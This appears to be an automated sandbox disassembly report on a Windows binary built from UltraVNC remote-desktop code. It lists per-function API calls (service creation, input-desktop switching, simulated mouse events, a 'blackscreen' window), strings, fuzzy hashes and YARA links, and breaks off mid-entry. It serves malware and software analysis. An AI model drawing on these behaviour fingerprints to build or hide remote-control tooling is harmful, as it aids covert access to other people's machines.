l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF790C46A0B
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF790C4695B
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF790C46A39

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
API String ID: 181403729-1081969236
Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
Instruction ID: 3691c3a5b8c9806fee4def4bfab76617d8b84ec0df80c06f0c4488f85c61cbab
Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
Instruction Fuzzy Hash: 466135A2A3859241EB38EB3494152F9B7A0FF46744FC4503AEA8E47795DE3CF14AD720

Function 00007FF790C34390 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 179windowsleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FF790C34440
CreateThread.KERNEL32 ref: 00007FF790C344B9
CloseHandle.KERNEL32 ref: 00007FF790C344C7
SendMessageA.USER32 ref: 00007FF790C344F7
FindWindowA.USER32 ref: 00007FF790C3456D
PostMessageA.USER32 ref: 00007FF790C34585
SendMessageA.USER32 ref: 00007FF790C345AD
mouse_event.USER32 ref: 00007FF790C345C5
Sleep.KERNEL32 ref: 00007FF790C345D0
mouse_event.USER32 ref: 00007FF790C345E7
FindWindowA.USER32 ref: 00007FF790C345F6
PostMessageA.USER32 ref: 00007FF790C3460E

Strings

blackscreen, xrefs: 00007FF790C34564, 00007FF790C345ED

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Message$FindPostSendSleepWindowmouse_event$CloseCreateHandleThread
String ID: blackscreen
API String ID: 1419467151-1520931032
Opcode ID: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
Instruction ID: 3d8b8f9a4c2e9a7231cb66bda53ff70e0913ffd33642a1c9460ee36e21a3eda6
Opcode Fuzzy Hash: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
Instruction Fuzzy Hash: 66819272E3D682A2FB70AB35E4406B6AAA0BF86744FC81535DA5C06795CF2DF540C730

Function 00007FF790C61CE0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 149COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790C61D13
LeaveCriticalSection.KERNEL32 ref: 00007FF790C61F1B
InvalidateRect.USER32 ref: 00007FF790C61F73
LeaveCriticalSection.KERNEL32 ref: 00007FF790C61F7F

Strings

vncdesktop.cpp : Start Mirror driver Failed, xrefs: 00007FF790C61E63
vncdesktop.cpp : Shared memory mapped, xrefs: 00007FF790C61F56
vncdesktop.cpp : Driver Used, xrefs: 00007FF790C61F41
vncdesktop.cpp : Driver option is enabled, xrefs: 00007FF790C61D1A
O, xrefs: 00007FF790C61D08
Default, xrefs: 00007FF790C61CE0, 00007FF790C61CE1
vncdesktop.cpp : Using non driver mode, xrefs: 00007FF790C61E78
vncdesktop.cpp : Closing pending driver driver version, xrefs: 00007FF790C61D39
vncdesktop.cpp : Start Mirror driver, xrefs: 00007FF790C61E33

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterInvalidateRect
String ID: Default$O$vncdesktop.cpp : Closing pending driver driver version$vncdesktop.cpp : Driver Used$vncdesktop.cpp : Driver option is enabled$vncdesktop.cpp : Shared memory mapped$vncdesktop.cpp : Start Mirror driver$vncdesktop.cpp : Start Mirror driver Failed$vncdesktop.cpp : Using non driver mode
API String ID: 3829719269-2763606790
Opcode ID: 5d513aa8406f826ec46c4d3060459385fd1a56e50c55edde39c3eb827b447b94
Instruction ID: 6042f0d387f1f3c359cf65de2277772f2c051eb5e5c757c25ddd92c06624bc80
Opcode Fuzzy Hash: 5d513aa8406f826ec46c4d3060459385fd1a56e50c55edde39c3eb827b447b94
Instruction Fuzzy Hash: F5714876A28A8285E764EF35D4002EDB7A5FF89B44F884532DA0D5B398CF3CE445C760

Function 00007FF790C42D00 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C42FE0: GetModuleFileNameA.KERNEL32 ref: 00007FF790C43009
Part of subcall function 00007FF790C42FE0: SetCurrentDirectoryA.KERNEL32 ref: 00007FF790C43041

OpenSCManagerA.ADVAPI32 ref: 00007FF790C42D23
CreateServiceA.ADVAPI32 ref: 00007FF790C42DB6
GetLastError.KERNEL32 ref: 00007FF790C42DC4
CloseServiceHandle.ADVAPI32 ref: 00007FF790C42DFB

Part of subcall function 00007FF790C3A040: OpenInputDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A07A
Part of subcall function 00007FF790C3A040: GetCurrentThreadId.KERNEL32 ref: 00007FF790C3A083
Part of subcall function 00007FF790C3A040: GetThreadDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A08B
Part of subcall function 00007FF790C3A040: SetThreadDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A0A6
Part of subcall function 00007FF790C3A040: MessageBoxA.USER32 ref: 00007FF790C3A0B7
Part of subcall function 00007FF790C3A040: SetThreadDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A0C2
Part of subcall function 00007FF790C3A040: CloseDesktop.USER32(?,?,?,00007FF790C382D7), ref: 00007FF790C3A0CB

Strings

uvnc_service, xrefs: 00007FF790C42D5A, 00007FF790C42D8E
Failed to create a new service, xrefs: 00007FF790C42DDF
Failed: Permission denied, xrefs: 00007FF790C42DCF
Tcpip, xrefs: 00007FF790C42D53
Failed to open service control manager, xrefs: 00007FF790C42D3C
UltraVNC, xrefs: 00007FF790C42D35, 00007FF790C42DE6

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCurrentOpenService$CreateDirectoryErrorFileHandleInputLastManagerMessageModuleName
String ID: Failed to create a new service$Failed to open service control manager$Failed: Permission denied$Tcpip$UltraVNC$uvnc_service
API String ID: 1695331641-1004021400
Opcode ID: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
Instruction ID: 64cdf5efc379ef221333926e0278f59e59383d2c61e24f19bb7d9b27ba00c550
Opcode Fuzzy Hash: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
Instruction Fuzzy Hash: 0C315671A28A4282EB24AB30E8412F9B3B1FF48744FC41035E98E42764DF6CF589CB20

Function 00007FF790C493E0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

EnumDisplaySettingsA.USER32 ref: 00007FF790C49422
LoadLibraryA.KERNEL32 ref: 00007FF790C49437
GetProcAddress.KERNEL32 ref: 00007FF790C4945B
CreateDCA.GDI32 ref: 00007FF790C49507
GetLastError.KERNEL32 ref: 00007FF790C49510
DeleteDC.GDI32 ref: 00007FF790C4951E
FreeLibrary.KERNEL32 ref: 00007FF790C49537

Strings

DISPLAY, xrefs: 00007FF790C494FA
mv video hook driver2, xrefs: 00007FF790C494C8
USER32, xrefs: 00007FF790C49428
EnumDisplayDevicesA, xrefs: 00007FF790C49449

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateDeleteDisplayEnumErrorFreeLastLoadProcSettings
String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
API String ID: 1846935786-1174184736
Opcode ID: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
Instruction ID: e3eea32e6f14dfe1a35e3c78ea9ce807b83a24436f26c0b08e029b595a127a49
Opcode Fuzzy Hash: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
Instruction Fuzzy Hash: 4F313C22A29A8295FB70EB31B8547AAB3A1FF8A744FC41135CA4E43794DF3CE105CB10

Function 00007FF790C33A90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF790C33AB6
LoadImageA.USER32 ref: 00007FF790C33B68
GetModuleHandleA.KERNEL32 ref: 00007FF790C33B7C
LoadImageA.USER32 ref: 00007FF790C33B9C
CreateDCA.GDI32 ref: 00007FF790C33BC5
GetDIBits.GDI32 ref: 00007FF790C33BF1
DeleteDC.GDI32 ref: 00007FF790C33C0E

Strings

\background.bmp, xrefs: 00007FF790C33B41
DISPLAY, xrefs: 00007FF790C33BA9
(, xrefs: 00007FF790C33BB8

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ImageLoadModule$BitsCreateDeleteFileHandleName
String ID: ($DISPLAY$\background.bmp
API String ID: 3125945695-1422902838
Opcode ID: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
Instruction ID: b2f4d3093fbd84024fcd5aebcbcd2d128d2e18725c0dc5ab39b43941a6d2e913
Opcode Fuzzy Hash: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
Instruction Fuzzy Hash: F4411036A28B8186E7709B34F8557AAB7B0FB89794F801235DA9D43B94DF3CE1158B10

Function 00007FF790CF2C70 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_set_error_mode.LIBCMT ref: 00007FF790CF2CB5
_set_error_mode.LIBCMT ref: 00007FF790CF2CC6
GetModuleFileNameW.KERNEL32 ref: 00007FF790CF2D28

Part of subcall function 00007FF790CF4930: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF790CF49D2), ref: 00007FF790CF4948

GetStdHandle.KERNEL32 ref: 00007FF790CF2E3D
WriteFile.KERNEL32 ref: 00007FF790CF2E9A

Strings

<program name unknown>, xrefs: 00007FF790CF2D37
..., xrefs: 00007FF790CF2D7A
Microsoft Visual C++ Runtime Library, xrefs: 00007FF790CF2DE1
Runtime Error!Program: , xrefs: 00007FF790CF2CF5

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 2183313154-4022980321
Opcode ID: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
Instruction ID: 84f3bb0ac05c8c2eb55ee3d032f6367e87fc8caef7c433dab8b89aec78c4e775
Opcode Fuzzy Hash: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
Instruction Fuzzy Hash: 8F51BF21B286424AF634F735A4226FAA2A6BF86784FD44135EF5D02B85CF3CF5068625

Function 00007FF790C89A40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 68registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C3D390: GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C89A92
RegOpenKeyExA.ADVAPI32 ref: 00007FF790C89AC0
RegQueryValueExA.ADVAPI32 ref: 00007FF790C89B0C
RegCloseKey.ADVAPI32 ref: 00007FF790C89B3A
GetPrivateProfileIntA.KERNEL32 ref: 00007FF790C89B75

Strings

UseRegistry, xrefs: 00007FF790C89A81
NewMSLogon, xrefs: 00007FF790C89AFD, 00007FF790C89B67
admin, xrefs: 00007FF790C89A88, 00007FF790C89B6E
Software\ORL\WinVNC3, xrefs: 00007FF790C89AAD

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CloseFileModuleNameOpenQueryValue
String ID: NewMSLogon$Software\ORL\WinVNC3$UseRegistry$admin
API String ID: 771632046-3493897170
Opcode ID: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
Instruction ID: 5819e2a4899afd2b87f10566f1867f7fecfbdb729b79ad8802d0c43211796337
Opcode Fuzzy Hash: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
Instruction Fuzzy Hash: E131EC31A29A8282EA70EB30F4557AAA3B0FB89754FC41135E64D46B54DF3DE505CB10

Function 00007FF790C56BBD Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2
LeaveCriticalSection.KERNEL32 ref: 00007FF790C57BAC

Part of subcall function 00007FF790C5C660: GetTickCount.KERNEL32 ref: 00007FF790C5C69F

Strings

vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$CloseCountCriticalInputLeaveOpenSectionTick
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 429868813-3977938048
Opcode ID: 1ce61eda1815472dcf5eec9035d10c7bcc81b982fce4800f6686f7fc95f08c9b
Instruction ID: 82c61e5cec8ee18b930505204ac7ca2662ee7fbab398196114d860fc6fdbb3c4
Opcode Fuzzy Hash: 1ce61eda1815472dcf5eec9035d10c7bcc81b982fce4800f6686f7fc95f08c9b
Instruction Fuzzy Hash: B7C1C026A2C69185F760AB35C8587FEABA1EF86B48F944131DA4C477A5CF3CF481C760

Function 00007FF790C4B3D0 Relevance: 14.0, APIs: 9, Instructions: 489COMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32 ref: 00007FF790C4B792
CreateRectRgn.GDI32 ref: 00007FF790C4B7C4
CombineRgn.GDI32 ref: 00007FF790C4B7E4
DeleteObject.GDI32 ref: 00007FF790C4B7ED
free.LIBCMT ref: 00007FF790C4B7F6
CreateRectRgn.GDI32 ref: 00007FF790C4BA18
CombineRgn.GDI32 ref: 00007FF790C4BA38
DeleteObject.GDI32 ref: 00007FF790C4BA41
free.LIBCMT ref: 00007FF790C4BA4A

Part of subcall function 00007FF790CE92A4: malloc.LIBCMT ref: 00007FF790CE92C7

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CreateRect$CombineDeleteObjectfree$malloc
String ID:
API String ID: 4067307076-0
Opcode ID: 20d05e3cb4de81eeb824483ab4ff36b23af894bb04d54c932c434dd6306be1f0
Instruction ID: 3be45d6e27d0b5484f4183f52264a0af5efced63a2e07d29985afa6d9add7162
Opcode Fuzzy Hash: 20d05e3cb4de81eeb824483ab4ff36b23af894bb04d54c932c434dd6306be1f0
Instruction Fuzzy Hash: F92260726186818BD724DF35E5406AEFBA2FB89784F445135EA8E87B58DB3CE941CF00

Function 00007FF790C474C0 Relevance: 13.6, APIs: 9, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32 ref: 00007FF790C47509
GetKeyState.USER32 ref: 00007FF790C47523
GetKeyState.USER32 ref: 00007FF790C4753D
GetKeyState.USER32 ref: 00007FF790C47557
GetKeyState.USER32 ref: 00007FF790C47571
GetKeyState.USER32 ref: 00007FF790C4758B
TryEnterCriticalSection.KERNEL32 ref: 00007FF790C475D6
LeaveCriticalSection.KERNEL32 ref: 00007FF790C4760F

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
